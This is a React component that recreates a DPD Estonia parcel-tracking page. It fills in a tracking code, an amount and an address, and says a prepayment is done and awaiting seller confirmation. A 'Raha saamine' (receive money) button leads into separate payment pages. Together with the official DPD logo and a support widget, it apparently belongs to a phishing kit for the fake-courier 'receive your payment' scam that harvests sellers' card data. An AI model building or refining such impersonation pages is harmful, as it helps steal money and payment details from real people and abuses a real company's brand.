import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdEeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const STEPPER_IMG = `${P}/dpd-ee-stepper.png`;
/** Ametlik DPD logo (2015), Wikimedia / dpd.com — sama fail mis CZ */
const DPD_LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

function IconBell() {
  return (
    <svg className="dpdee-header-ico-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 22c1.1 0 2-.9 2-2h-4c0 1.1.89 2 2 2zm6-6v-5c0-3.07-1.64-5.64-4.5-6.32V4c0-.83-.67-1.5-1.5-1.5s-1.5.67-1.5 1.5v.68C7.63 5.36 6 7.92 6 11v5l-2 2v1h16v-1l-2-2z"
      />
    </svg>
  );
}

function IconUser() {
  return (
    <svg className="dpdee-header-ico-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"
      />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="dpdee-search-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0016 9.5 6.5 6.5 0 109.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 4 11.01 4 8s3.01-6 6.5-6S17 5.01 17 8s-3.01 6-6.5 6z"
      />
    </svg>
  );
}

/** Иконка «Raha saamine»: купюра с плюсом в круге (как на скрине). */
function MoneyReceiveIcon() {
  return (
    <svg className="dpdee-money-ico" viewBox="0 0 24 24" aria-hidden>
      <rect x="2.5" y="7" width="19" height="10" rx="1.2" fill="none" stroke="currentColor" strokeWidth="1.4" />
      <circle cx="12" cy="12" r="3.2" fill="none" stroke="currentColor" strokeWidth="1.2" />
      <path d="M12 10.2v3.6M10.2 12h3.6" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round" />
    </svg>
  );
}

/**
 * DPD Eesti — success: layout и тексты как на скрине; степпер — референс-PNG; логотип и иконки — SVG.
 */
function DpdEeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'EE').toUpperCase();
  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountWithEuro = priceText === '—' ? '—' : `${priceText} €`;
  const address = (pageData?.delivery_address || '').trim() || '—';
  const trackingCode =
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    pageData?.page_code ||
    pageCode ||
    '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dpdee-wrap">
        <header className="dpdee-header">
          <div className="dpdee-header-inner">
            <div className="dpdee-logo" aria-label="DPD">
              <img src={DPD_LOGO_SRC} alt="DPD" className="dpdee-header-logo-img" decoding="async" />
            </div>
          </div>
        </header>
        <main className="dpdee-main">
          <div className="dpdee-loading">Lehe laadimine...</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dpdee-wrap">
      <header className="dpdee-header">
        <div className="dpdee-header-inner">
          <a href="#/" className="dpdee-logo" aria-label="DPD avaleht">
            <img src={DPD_LOGO_SRC} alt="DPD" className="dpdee-header-logo-img" decoding="async" />
          </a>
          <nav className="dpdee-nav">
            <a href="#/" className="dpdee-nav-link">
              Logi sisse/Registreeru
            </a>
            <a href="#/" className="dpdee-nav-link">
              Saada pakk
            </a>
            <a href="#/" className="dpdee-nav-link dpdee-nav-link--active">
              Minu pakid
            </a>
            <a href="#/" className="dpdee-nav-link">
              Leia lähim pakiautomaat
            </a>
            <a href="#/" className="dpdee-nav-link">
              KKK
            </a>
          </nav>
          <div className="dpdee-header-icons">
            <button type="button" className="dpdee-icon-btn" aria-label="Teavitused">
              <IconBell />
            </button>
            <button type="button" className="dpdee-icon-btn" aria-label="Kasutaja">
              <IconUser />
            </button>
          </div>
        </div>
      </header>

      <main className="dpdee-main">
        <section className="dpdee-tracking">
          <div className="dpdee-tracking-left">
            <div className="dpdee-tabs">
              <button type="button" className="dpdee-tab dpdee-tab--active">
                Väljumised
              </button>
              <button type="button" className="dpdee-tab">
                Tagastamine
              </button>
            </div>
            <div className="dpdee-search">
              <input type="text" className="dpdee-search-input" placeholder="Pakinumber" readOnly />
              <span className="dpdee-search-icon-wrap" aria-hidden>
                <IconSearch />
              </span>
            </div>
            <div className="dpdee-search-list">
              <div className="dpdee-search-item-code">{trackingCode}</div>
              <div className="dpdee-search-item-status">Ettemaks on tehtud</div>
              <div className="dpdee-search-steps" aria-hidden>
                <span className="dpdee-step dpdee-step--active" />
                <span className="dpdee-step" />
                <span className="dpdee-step" />
                <span className="dpdee-step" />
                <span className="dpdee-step" />
              </div>
            </div>
          </div>

          <div className="dpdee-tracking-main">
            <div className="dpdee-tracking-header">
              <h2 className="dpdee-tracking-title">Saadetis: {trackingCode}</h2>
              <div className="dpdee-stepper-wrap">
                <img src={STEPPER_IMG} alt="" className="dpdee-stepper-img" decoding="async" />
              </div>
            </div>

            <div className="dpdee-detail-card">
              <div className="dpdee-detail-split">
                <div className="dpdee-detail-amounts" aria-label="Summa">
                  <div className="dpdee-detail-amount-line dpdee-detail-amount-line--top">{amountWithEuro}</div>
                  <div className="dpdee-detail-amount-line dpdee-detail-amount-line--bottom">{priceText}</div>
                </div>
                <div className="dpdee-detail-status">
                  <div className="dpdee-status-row">
                    <span className="dpdee-status-dot" aria-hidden />
                    <span>Ettemaks on tehtud, ootan müüja kinnitust</span>
                  </div>
                  <div className="dpdee-status-address">{address}</div>
                </div>
              </div>
              <Link to={index2Path} className="dpdee-money-btn">
                <MoneyReceiveIcon />
                Raha saamine
              </Link>
            </div>
          </div>
        </section>

        <footer className="dpdee-page-footer">
          <div className="dpdee-page-footer-top">
            <div className="dpdee-footer-brand">
              <span className="dpdee-footer-network">NETWORK MEMBER OF</span>
              <span className="dpdee-footer-geopost">GEOPOST</span>
            </div>
            <div className="dpdee-footer-version">Projekti versioon: 3.122.0</div>
            <div className="dpdee-footer-copy-right">© 2025 DPDgroup</div>
          </div>
          <div className="dpdee-page-footer-links">
            <a href="#/">Tüüptingimused</a>
            <span className="dpdee-footer-dot">·</span>
            <a href="#/">Privaatsus</a>
            <span className="dpdee-footer-dot">·</span>
            <a href="#/">Abi/KKK</a>
          </div>
        </footer>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DpdEeSuccess;
